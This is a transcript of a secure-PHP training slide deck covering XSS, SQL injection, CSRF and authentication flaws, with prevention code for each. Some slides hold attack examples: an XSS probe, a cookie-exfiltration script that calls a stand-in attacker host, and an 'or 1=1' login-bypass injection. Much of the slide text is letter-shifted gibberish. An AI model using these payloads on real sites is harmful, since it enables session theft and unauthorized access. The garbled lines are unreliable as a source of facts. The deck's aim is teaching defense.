Secure PHP Bootcamp

Transcript

1. Secure PHP Development
   $ISJT$PSOVUU!FOZHNB
   

   View Slide

2. https://jetbrains.com
   

   View Slide

3. Goals
   #BTJDBQQTFDQSJODJQMFT
   7VMOFSBCJMJUJFT&YQMPJUT
   )BOETPOFYQFSJFODF
   5PPMT5FDIOJRVFT
   

   View Slide

4. 1)1%FW:FBST
   "QQTFDGPDVTFE
   IUUQXFCTFDJP
   IUUQTFDVSJOHQIQDPN
   

   View Slide

5. IUUQCJUMZPXBTQUPQ
   

   View Slide

6. 5IFSF`T
   OPTVDIUIJOH
   BTTFDVSF
   

   View Slide

7. IUUQTHJUIVCDPNQTFDJPOPUDI
   /PUDI"7VMOFSBCMF"QQMJDBUJPO
   

   View Slide

8. IUUQTHJUIVCDPNQTFDJPOPUDI
   4FUVQ5JNF
   PSIUUQOPUDITFDVSJOHQIQDPN
   

   View Slide

9. View Slide

10. XSS:
    Cross Site Scripting
    

    View Slide

11. *OKFDUJPOPGDPOUFOUJOUPUIFQBHF
    VTVBMMZ+BWBTDSJQU
    SFqFDUFEWTTUPSFE
    QPPSPVUQVUFTDBQJOH
    

    View Slide

12. Example
    echo “Howdy, my name is “.$_GET[‘name’];
    ?>
    ?name=alert(“xss”)
    

    View Slide

13. Example
    <br/>xmlhttp = new XMLHttpRequest();<br/>xmlhttp.open(<br/>'GET',<br/>‘http://leethack.php?cookies=‘+document.cookie,<br/>true);<br/>xmlhttp.send();<br/>
    "TTVNFTDSPTTPSJHJOQPMJDZPG
    

    View Slide

14. Prevention #1
    $name = htmlspecialchars(
    $_GET[‘name’], ENT_COMPAT, ‘UTF-8’
    );
    echo “Howdy, my name is “.$name;
    ?>
    /PUF5IJTJTPOMZGPSB)5.-DPOUFYU
    

    View Slide

15. Prevention #2
    {{ name|e(‘html’) }}
    {{ name|e(‘html_attr’) }}
    {{ name|e(‘js’) }}
    {{ name|e(‘css’) }}
    /PUF5IJTFYBNQMFSFRVJSFT5XJH
    

    View Slide

16. SQLi:
    SQL Injection
    

    View Slide

17. *OKFDUJPOTQFDJpDUP42-TUBUFNFOUT
    FYQPTFEBUB
    CZQBTTBVUINFDIBOJTNT
    QPPSJOQVUpMUFSJOH
    

    View Slide

18. Example
    $sql = ‘select id
    from users
    where username = “‘.$_POST[‘username’].’”
    and password = “‘.$_POST[‘password’].’”’;
    password=‘ or 1=1; #
    select id
    from users
    where username = “user1”
    and password = “” or 1=1; #
    

    View Slide

19. BEE@TMBTIFT
    NZTRM@SFBM@FTDBQF@TUSJOH
    NZTRMJ@SFBM@FTDBQF@TUSJOH
    

    View Slide

20. BEE@TMBTIFT
    NZTRM@SFBM@FTDBQF@TUSJOH
    NZTRMJ@SFBM@FTDBQF@TUSJOH
    X
    

    View Slide

21. Prevention
    $stmt = $dbh->prepare(‘select id from users’
    .’ where username = :user’
    .’ and password = :pass’);
    $stmt->execute(array(
    ‘user’ => $_POST[‘username’],
    ‘pass’ => $_POST[‘password’]
    ));
    $results = $stmt->fetchAll(PDO::FETCH_ASSOC);
    ?>
    /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU
    

    View Slide

22. CSRF:
    Cross Site Request
    Forgery
    

    View Slide

23. VOWBMJEBUFEGPSNTVCNJTTJPO
    POBMMTUBUFDIBOHFT
    XIBU`TUIFTPVSDF
    TJNQMF
    SBOEPNJ[FE GPSFBDIGPSN
    
    

    View Slide

24. Example
    
    
    
    
    
    

    View Slide

25. Example
    
    
    
    
    value=“098f6bcd4621d373cade4e832627b4f6”
    name=“csrf-token”/>
    
    

    View Slide

26. Auth*:
    Authentication &
    Authorization
    

    View Slide

27. EJSFDUPCKFDUSFGFSFODF "
    
    EBUBBDDFTT
    EBOHFSPVTBDUJPOT
    QPPSVTFSNBOBHFNFOU
    

    View Slide

28. QMBJOUFYUQBTTXPSET
    OPQBTTXPSEQPMJDZ
    PWFSMZDPNQMFYQBTTXPSET
    QBTTXPSEIJOUT
    

    View Slide

29. View Slide

30. View Slide

31. And…
    

    View Slide

32. 4FDVSJUZ.JTDPOpHVSBUJPO
    4FOTJUJWF%BUB&YQPTVSF
    $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT
    6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET
    

    View Slide

33. 5IBU`TBMMGPMLT
    !FOZHNB
    !TFDVSJOHQIQ
    IUUQTFDVSJOHQIQDPN
    

    View Slide